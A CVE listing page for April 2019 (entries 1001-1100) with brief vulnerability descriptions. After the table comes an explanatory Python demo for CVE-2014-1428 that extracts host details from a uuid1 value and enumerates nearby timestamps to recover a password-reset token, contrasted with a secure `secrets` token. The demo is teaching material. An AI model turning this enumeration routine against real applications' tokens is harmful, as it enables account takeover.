CVE List - 2019 / April
Showing 1001 - 1100 of 1531 CVEs for April 2019 (Page 11 of 16)
| CVE ID | Date | Description |
|---|---|---|
| CVE-2019-11412 | 2019-04-21 | An issue was discovered in Artifex MuJS 1.0.5. jscompile.c can cause a denial of service (invalid stack-frame jump) because it lacks an ENDTRY opcode call. |
| CVE-2019-11413 | 2019-04-21 | An issue was discovered in Artifex MuJS 1.0.5. It has unlimited recursion because the match function in regexp.c lacks a depth check. |
| CVE-2019-11414 | 2019-04-21 | An issue was discovered on Intelbras IWR 3000N 1.5.0 devices. When the administrator password is changed from a certain client IP address, administrative authorization remains available to any client at... |
| CVE-2019-11415 | 2019-04-21 | An issue was discovered on Intelbras IWR 3000N 1.5.0 devices. A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of... |
| CVE-2019-11416 | 2019-04-21 | A CSRF issue was discovered on Intelbras IWR 3000N 1.5.0 devices, leading to complete control of the router, as demonstrated by v1/system/user. |
| CVE-2018-20818 | 2019-04-21 | A buffer overflow vulnerability was discovered in the OpenPLC controller, in the OpenPLC_v2 and OpenPLC_v3 versions. It occurs in the modbus.cpp mapUnusedIO() function, which can cause a runtime crash of... |
| CVE-2019-11417 | 2019-04-21 | system.cgi on TRENDnet TV-IP110WN cameras has a buffer overflow caused by an inadequate source-length check before a strcpy operation in the respondAsp function. Attackers can exploit the vulnerability by using... |
| CVE-2019-11418 | 2019-04-21 | apply.cgi on the TRENDnet TEW-632BRP 1.010B32 router has a buffer overflow via long strings to the SOAPACTION:HNAP1 interface. |
| CVE-2019-11426 | 2019-04-21 | An XSS issue was discovered in app/admincp/template/admincp.header.php in idreamsoft iCMS 7.0.14 via the admincp.php?app=config tab parameter. |
| CVE-2019-11427 | 2019-04-21 | An XSS issue was discovered in app/search/search.app.php in idreamsoft iCMS 7.0.14 via the public/api.php?app=search q parameter. |
| CVE-2019-11428 | 2019-04-21 | I, Librarian 4.10 has XSS via the export.php export_files parameter. |
| CVE-2019-11444 | 2019-04-22 | An issue was discovered in Liferay Portal CE 7.1.2 GA3. An attacker can use Liferay's Groovy script console to execute OS commands. Commands can be executed via a [command].execute() call,... |
| CVE-2019-11445 | 2019-04-22 | OpenKM 6.3.2 through 6.3.7 allows an attacker to upload a malicious JSP file into the /okm:root directories and move that file to the home directory of the site, via frontend/FileUpload... |
| CVE-2019-11446 | 2019-04-22 | An issue was discovered in ATutor through 2.2.4. It allows the user to run commands on the server with the teacher user privilege. The Upload Files section in the File... |
| CVE-2019-11447 | 2019-04-22 | An issue was discovered in CutePHP CuteNews 2.1.2. An attacker can infiltrate the server through the avatar upload process in the profile area via the avatar_file field to index.php?mod=main&opt=personal. There... |
| CVE-2019-11448 | 2019-04-22 | An issue was discovered in Zoho ManageEngine Applications Manager 11.0 through 14.0. An unauthenticated user can gain the authority of SYSTEM on the server due to a Popup_SLA.jsp sid SQL... |
| CVE-2019-11449 | 2019-04-22 | I, Librarian 4.10 has XSS via the notes.php notes parameter. |
| CVE-2019-11450 | 2019-04-22 | whatsns 4.0 allows index.php?question/ajaxadd.html title SQL injection. |
| CVE-2019-11451 | 2019-04-22 | whatsns 4.0 allows index.php?inform/add.html qid SQL injection. |
| CVE-2019-11452 | 2019-04-22 | whatsns 4.0 allows index.php?admin_category/remove.html cid[] SQL injection. |
| CVE-2019-11243 | 2019-04-22 | In Kubernetes v1.12.0-v1.12.4 and v1.13.0, the rest.AnonymousClientConfig() method returns a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data). In the affected versions, rest.AnonymousClientConfig()... |
| CVE-2019-11244 | 2019-04-22 | kubectl creates world-writeable cached schema files |
| CVE-2019-11454 | 2019-04-22 | Persistent cross-site scripting (XSS) in http/cervlet.c in Tildeslash Monit before 5.25.3 allows a remote unauthenticated attacker to introduce arbitrary JavaScript via manipulation of an unsanitized user field of the Authorization... |
| CVE-2019-11455 | 2019-04-22 | A buffer over-read in Util_urlDecode in util.c in Tildeslash Monit before 5.25.3 allows a remote authenticated attacker to retrieve the contents of adjacent memory via manipulation of GET or POST... |
| CVE-2019-3899 | 2019-04-22 | It was found that the default configuration of Heketi does not require any authentication, potentially exposing the management interface to misuse. This issue only affects heketi as shipped with OpenShift Container... |
| CVE-2019-6155 | 2019-04-22 | A potential vulnerability was found in an SMI handler in various BIOS versions of certain legacy IBM System x and IBM BladeCenter systems that could lead to denial of service. |
| CVE-2019-6157 | 2019-04-22 | In various firmware versions of Lenovo System x, the integrated management module II (IMM2)'s first failure data capture (FFDC) includes the web server's private key in the generated log file... |
| CVE-2019-3901 | 2019-04-22 | A race condition in perf_event_open() allows local attackers to leak sensitive data from setuid programs. As no relevant locks (in particular the cred_guard_mutex) are held during the ptrace_may_access() call, it... |
| CVE-2019-3902 | 2019-04-22 | A flaw was found in Mercurial before 4.9. It was possible to use symlinks and subrepositories to defeat Mercurial's path-checking logic and write files outside a repository. |
| CVE-2019-11456 | 2019-04-22 | Gila CMS 1.10.1 allows fm/save CSRF for executing arbitrary PHP code. |
| CVE-2011-1830 | 2019-04-22 | Ekiga attempts to dlopen /tmp/ekiga_test.so |
| CVE-2011-3145 | 2019-04-22 | mount.ecryptfs_private sets group owner of /etc/mtab to user's primary group |
| CVE-2011-3147 | 2019-04-22 | qcow format could expose host filesystem information |
| CVE-2011-3151 | 2019-04-22 | SELinux initscript misuse of touch |
| CVE-2014-1426 | 2019-04-22 | get_file_by_name does not check owner |
| CVE-2014-1427 | 2019-04-22 | MAAS API vulnerable to CSRF attack |
| CVE-2014-1428 | 2019-04-22 | uuid.uuid1() is not suitable as an unguessable identifier/token |
| CVE-2015-1316 | 2019-04-22 | Juju Joyent provider uploads user's private ssh key by default |
| CVE-2015-1320 | 2019-04-22 | Probe-and-enlist for SeaMicro chassis writes password to the log |
| CVE-2015-1326 | 2019-04-22 | python-dbusmock arbitrary code execution or file overwrite when templates are loaded from /tmp |
| CVE-2015-1327 | 2019-04-22 | Content-hub DBUS API doesn't prevent confined apps from passing paths to files without access |
| CVE-2015-1340 | 2019-04-22 | chmod race in doUidshiftIntoContainer |
| CVE-2015-1341 | 2019-04-22 | Apport privilege escalation through Python module imports |
| CVE-2015-1343 | 2019-04-22 | unity-scope-gdrive search feature logs search terms to syslog |
| CVE-2016-1573 | 2019-04-22 | Using a specially crafted fallback art property, scopes can execute arbitrary QML code in context of unity8-dash |
| CVE-2016-1579 | 2019-04-22 | UDM doesn't check for confinement before running post-processing commands |
| CVE-2016-1584 | 2019-04-22 | Unity8 converged application lifecycle allows background applications to use on-screen keyboard when not top-most |
| CVE-2016-1585 | 2019-04-22 | AppArmor mount rules grant excessive permissions |
| CVE-2016-1586 | 2019-04-22 | A malicious webview could install long-lived unload handlers that re-use an incognito BrowserContext that is queued for destruction in versions of Oxide before 1.18.3. |
| CVE-2016-1587 | 2019-04-22 | The Snapweb interface before version 0.21.2 was exposing controls to install or remove snap packages without controlling the identity of the user, nor the origin of the connection. An attacker... |
| CVE-2019-9955 | 2019-04-22 | On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security firewall login page is... |
| CVE-2019-10241 | 2019-04-22 | In Eclipse Jetty version 9.2.26 and older, 9.3.25 and older, and 9.4.15 and older, the server is vulnerable to XSS conditions if a remote client uses a specially formatted URL... |
| CVE-2019-10246 | 2019-04-22 | In Eclipse Jetty version 9.2.27, 9.3.26, and 9.4.16, the server running on Windows is vulnerable to exposure of the fully qualified Base Resource directory name on Windows to a remote... |
| CVE-2019-10247 | 2019-04-22 | In Eclipse Jetty version 7.x, 8.x, 9.2.27 and older, 9.3.26 and older, and 9.4.16 and older, the server running on any OS and Jetty version combination will reveal the configured... |
| CVE-2019-10248 | 2019-04-22 | Eclipse Vorto versions prior to 0.11 resolved Maven build artifacts for the Xtext project over HTTP instead of HTTPS. Any of these dependent artifacts could have been maliciously compromised by... |
| CVE-2019-11459 | 2019-04-22 | The tiff_document_render() and tiff_document_get_thumbnail() functions in the TIFF document backend in GNOME Evince through 3.32.0 did not handle errors from TIFFReadRGBAImageOriented(), leading to uninitialized memory use when processing certain TIFF... |
| CVE-2019-11460 | 2019-04-22 | An issue was discovered in GNOME gnome-desktop 3.26, 3.28, and 3.30 prior to 3.30.2.2, and 3.32 prior to 3.32.1.1. A compromised thumbnailer may escape the bubblewrap sandbox used to confine... |
| CVE-2019-11461 | 2019-04-22 | An issue was discovered in GNOME Nautilus 3.30 prior to 3.30.6 and 3.32 prior to 3.32.1. A compromised thumbnailer may escape the bubblewrap sandbox used to confine thumbnailers by using... |
| CVE-2019-5427 | 2019-04-22 | c3p0 version < 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration. |
| CVE-2019-11384 | 2019-04-22 | The Zalora application 6.15.1 for Android stores confidential information insecurely on the system (i.e. plain text), which allows a non-root user to find out the username/password of a valid user... |
| CVE-2019-11383 | 2019-04-22 | An issue was discovered in the Medha WiFi FTP Server application 1.8.3 for Android. An attacker can read the username/password of a valid user via /data/data/com.medhaapps.wififtpserver/shared_prefs/com.medhaapps.wififtpserver_preferences.xml |
| CVE-2019-0218 | 2019-04-22 | A vulnerability was discovered wherein a specially crafted URL could enable reflected XSS via JavaScript in the pony mail interface. |
| CVE-2019-8452 | 2019-04-22 | A hard-link created from log file archive of Check Point ZoneAlarm up to 15.4.062 or Check Point Endpoint Security client for Windows before E80.96 to any file on the system... |
| CVE-2019-11463 | 2019-04-23 | A memory leak in archive_read_format_zip_cleanup in archive_read_support_format_zip.c in libarchive 3.3.4-dev allows remote attackers to cause a denial of service via a crafted ZIP file because of a HAVE_LZMA_H typo. NOTE:... |
| CVE-2013-7470 | 2019-04-23 | cipso_v4_validate in include/net/cipso_ipv4.h in the Linux kernel before 3.11.7, when CONFIG_NETLABEL is disabled, allows attackers to cause a denial of service (infinite loop and crash), as demonstrated by icmpsic, a... |
| CVE-2019-11469 | 2019-04-23 | Zoho ManageEngine Applications Manager 12 through 14 allows FaultTemplateOptions.jsp resourceid SQL injection. Subsequently, an unauthenticated user can gain the authority of SYSTEM on the server by uploading a malicious file... |
| CVE-2018-17169 | 2019-04-23 | An XML external entity (XXE) vulnerability in PrinterOn version 4.1.4 and lower allows remote authenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted... |
| CVE-2018-20819 | 2019-04-23 | io/ZlibCompression.cc in the decompression component in Dropbox Lepton 1.2.1 allows attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact by... |
| CVE-2018-20820 | 2019-04-23 | read_ujpg in jpgcoder.cc in Dropbox Lepton 1.2.1 allows attackers to cause a denial-of-service (application runtime crash because of an integer overflow) via a crafted file. |
| CVE-2018-20821 | 2019-04-23 | The parsing component in LibSass through 3.5.5 allows attackers to cause a denial-of-service (uncontrolled recursion in Sass::Parser::parse_css_variable_value in parser.cpp). |
| CVE-2018-20822 | 2019-04-23 | LibSass 3.5.4 allows attackers to cause a denial-of-service (uncontrolled recursion in Sass::Complex_Selector::perform in ast.hpp and Sass::Inspect::operator in inspect.cpp). |
| CVE-2019-11470 | 2019-04-23 | The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs... |
| CVE-2019-11471 | 2019-04-23 | libheif 1.4.0 has a use-after-free in heif::HeifContext::Image::set_alpha_channel in heif_context.h because heif_context.cc mishandles references to non-existing alpha images. |
| CVE-2019-11472 | 2019-04-23 | ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the... |
| CVE-2019-11473 | 2019-04-23 | coders/xwd.c in GraphicsMagick 1.3.31 allows attackers to cause a denial of service (out-of-bounds read and application crash) by crafting an XWD image file, a different vulnerability than CVE-2019-11008 and CVE-2019-11009. |
| CVE-2019-11474 | 2019-04-23 | coders/xwd.c in GraphicsMagick 1.3.31 allows attackers to cause a denial of service (floating-point exception and application crash) by crafting an XWD image file, a different vulnerability than CVE-2019-11008 and CVE-2019-11009. |
| CVE-2017-12619 | 2019-04-23 | Apache Zeppelin prior to 0.7.3 was vulnerable to session fixation which allowed an attacker to hijack a valid user session. Issue was reported by "stone lone". |
| CVE-2018-1317 | 2019-04-23 | In Apache Zeppelin prior to 0.8.0 the cron scheduler was enabled by default and could allow users to run paragraphs as other users without authentication. |
| CVE-2018-1328 | 2019-04-23 | Apache Zeppelin prior to 0.8.0 had a stored XSS issue via Note permissions. Issue reported by "Josna Joseph". |
| CVE-2019-0223 | 2019-04-23 | While investigating bug PROTON-2014, we discovered that under some circumstances Apache Qpid Proton versions 0.9 to 0.27.0 (C library and its language bindings) can connect to a peer anonymously using... |
| CVE-2019-7303 | 2019-04-23 | Snapd seccomp filter TIOCSTI ioctl bypass |
| CVE-2019-7304 | 2019-04-23 | Local privilege escalation via snapd socket |
| CVE-2019-11076 | 2019-04-23 | Cribl UI 1.5.0 allows remote attackers to run arbitrary commands via an unauthenticated web request. |
| CVE-2019-10864 | 2019-04-23 | The WP Statistics plugin through 12.6.2 for WordPress has XSS, allowing a remote attacker to inject arbitrary web script or HTML via the Referer header of a GET request. |
| CVE-2018-2880 | 2019-04-23 | Vulnerability in the MICROS Retail-J component of Oracle Retail Applications (subcomponent: Back Office). The supported version that is affected is 12.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access... |
| CVE-2018-3120 | 2019-04-23 | Vulnerability in the MICROS Lucas component of Oracle Retail Applications (subcomponent: Security). Supported versions that are affected are 2.9.5.6 and 2.9.5.7. Difficult to exploit vulnerability allows low privileged attacker with... |
| CVE-2018-3123 | 2019-04-23 | Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: libmysqld). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Difficult to... |
| CVE-2018-3312 | 2019-04-23 | Vulnerability in the Oracle Retail Customer Engagement component of Oracle Retail Applications (subcomponent: Segment). Supported versions that are affected are 16.0 and 17.0. Difficult to exploit vulnerability allows high privileged... |
| CVE-2018-3314 | 2019-04-23 | Vulnerability in the MICROS Relate CRM Software component of Oracle Retail Applications (subcomponent: Customer). The supported version that is affected is 11.4. Difficult to exploit vulnerability allows low privileged attacker... |
| CVE-2019-2424 | 2019-04-23 | Vulnerability in the Oracle Retail Convenience Store Back Office component of Oracle Retail Applications (subcomponent: Level 3 Maintenance Functions). The supported version that is affected is 3.6. Easily exploitable vulnerability... |
| CVE-2019-2516 | 2019-04-23 | Vulnerability in the Portable Clusterware component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1 and 18c. Easily exploitable vulnerability allows high privileged attacker having Grid... |
| CVE-2019-2517 | 2019-04-23 | Vulnerability in the Core RDBMS component of Oracle Database Server. Supported versions that are affected are 12.2.0.1 and 18c. Easily exploitable vulnerability allows high privileged attacker having DBFS_ROLE privilege with... |
| CVE-2019-2518 | 2019-04-23 | Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows low privileged attacker... |
| CVE-2019-2551 | 2019-04-23 | Vulnerability in the Oracle One-to-One Fulfillment component of Oracle E-Business Suite (subcomponent: Print Server). Supported versions that are affected are 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6, 12.2.7 and 12.2.8.... |
| CVE-2019-2557 | 2019-04-23 | Vulnerability in the Oracle Application Testing Suite component of Oracle Enterprise Manager Products Suite (subcomponent: Load Testing for Web Apps). The supported version that is affected is 13.3.0.1. Easily exploitable... |
| CVE-2019-2558 | 2019-04-23 | Vulnerability in the Oracle Retail Point-of-Service component of Oracle Retail Applications (subcomponent: Infrastructure). Supported versions that are affected are 13.4, 14.0 and 14.1. Easily exploitable vulnerability allows unauthenticated attacker with... |
| CVE-2019-2564 | 2019-04-23 | Vulnerability in the JD Edwards EnterpriseOne Tools component of Oracle JD Edwards Products (subcomponent: Web Runtime). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged... |
| CVE-2019-2565 | 2019-04-23 | Vulnerability in the JD Edwards World Technical Foundation component of Oracle JD Edwards Products (subcomponent: Service Enablement). Supported versions that are affected are A9.2, A9.3.1 and A9.4. Easily exploitable vulnerability... |
| CVE-2019-2566 | 2019-04-23 | Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Audit Plug-in). Supported versions that are affected are 5.7.25 and prior and 8.0.15 and prior. Easily exploitable vulnerability allows... |
| CVE-2019-2567 | 2019-04-23 | Vulnerability in the Oracle Configurator component of Oracle Supply Chain Products Suite (subcomponent: Active Model Generation). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated... |
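CVE-2014-1428 above states that uuid.uuid1() is not fit for an unguessable identifier or token, but the row does not show why. The following is an added Python example written for this listing; it is not code from the affected Ubuntu project or from any CVE record. It reads the node id (normally the primary MAC address), the clock sequence and the 100 ns timestamp out of one version-1 UUID, then enumerates every UUID the same host could have minted inside a small time window until an oracle accepts one, and contrasts that with a token drawn from the `secrets` module. The victim node id, clock sequence, 1 ms search window and the equality oracle are all constructed for the demonstration; a real attacker would substitute a request to the target for the oracle.

```python
import secrets
import uuid
from typing import Callable, Optional

# 100 ns ticks between the UUID epoch (1582-10-15) and the Unix epoch (1970-01-01),
# the offset CPython's uuid1() adds to time.time_ns() // 100.
UUID1_EPOCH_OFFSET = 0x01B21DD213814000


def uuid1_fields(u: uuid.UUID) -> dict:
    """Everything a version-1 UUID reveals about the host that minted it."""
    if u.version != 1:
        raise ValueError("not a version-1 UUID")
    return {
        "node": u.node,  # 48-bit node id, usually the primary MAC address
        "mac": ":".join(f"{(u.node >> s) & 0xFF:02x}" for s in range(40, -1, -8)),
        "clock_seq": u.clock_seq,  # 14 bits, fixed for the life of the process
        "unix_time": (u.time - UUID1_EPOCH_OFFSET) / 1e7,  # mint time, 100 ns resolution
    }


def uuid1_from_parts(ticks: int, clock_seq: int, node: int) -> uuid.UUID:
    """Rebuild the exact UUID a uuid1() host emits for a given 100 ns tick count."""
    return uuid.UUID(
        fields=(
            ticks & 0xFFFFFFFF,  # time_low
            (ticks >> 32) & 0xFFFF,  # time_mid
            (ticks >> 48) & 0x0FFF,  # time_hi_version (version bits set below)
            (clock_seq >> 8) & 0x3F,  # clock_seq_hi_variant (variant bits set below)
            clock_seq & 0xFF,  # clock_seq_low
            node,
        ),
        version=1,
    )


def recover_uuid1_token(
    leaked: uuid.UUID,
    approx_time: float,
    window_s: float,
    is_valid: Callable[[uuid.UUID], bool],
) -> Optional[uuid.UUID]:
    """Enumerate every uuid1 the same host could have minted within +/- window_s of approx_time.

    `leaked` is any uuid1 previously seen from the target: it fixes node and clock_seq.
    `is_valid` stands in for the attacker's oracle (e.g. "does this reset link return 200?").
    A 1 ms window is only 20 001 candidates, so the search is cheap.
    """
    info = uuid1_fields(leaked)
    first = int((approx_time - window_s) * 1e7) + UUID1_EPOCH_OFFSET
    last = int((approx_time + window_s) * 1e7) + UUID1_EPOCH_OFFSET
    for ticks in range(first, last + 1):
        candidate = uuid1_from_parts(ticks, info["clock_seq"], info["node"])
        if is_valid(candidate):
            return candidate
    return None


def issue_token(nbytes: int = 32) -> str:
    """What the token should have been: CSPRNG output with no structure to enumerate."""
    return secrets.token_urlsafe(nbytes)


def demo_attack(node: int = 0x001122334455, clock_seq: int = 0x0ABC) -> dict:
    """Constructed scenario: an app hands out uuid1() as a password-reset token.

    Passing node and clock_seq explicitly keeps CPython on its pure-Python uuid1 path
    (time.time_ns() based) so the run is reproducible on any platform.
    """
    reset_token = uuid.uuid1(node=node, clock_seq=clock_seq)
    # The attacker has seen one other token from the same host (e.g. their own session id)
    # and knows roughly when the victim requested the reset: here, within 1 ms.
    earlier = uuid.uuid1(node=node, clock_seq=clock_seq)
    guessed_time = uuid1_fields(reset_token)["unix_time"] + 0.0004
    found = recover_uuid1_token(earlier, guessed_time, 0.001, lambda c: c == reset_token)
    return {
        "reset_token": reset_token,
        "earlier": earlier,
        "leaked": uuid1_fields(earlier),
        "recovered": found,
    }


if __name__ == "__main__":
    result = demo_attack()
    print("fields leaked by one token:", result["leaked"])
    print("recovered reset token:", result["recovered"],
          "match:", result["recovered"] == result["reset_token"])
    print("what to issue instead:", issue_token())
```

The oracle in the demo compares against the real token directly; in practice the comparison is whatever the application does with the token, and the point is that node and clock sequence are shared by every token a process mints, so one leaked value plus a rough time bound reduces the search to a few thousand candidates.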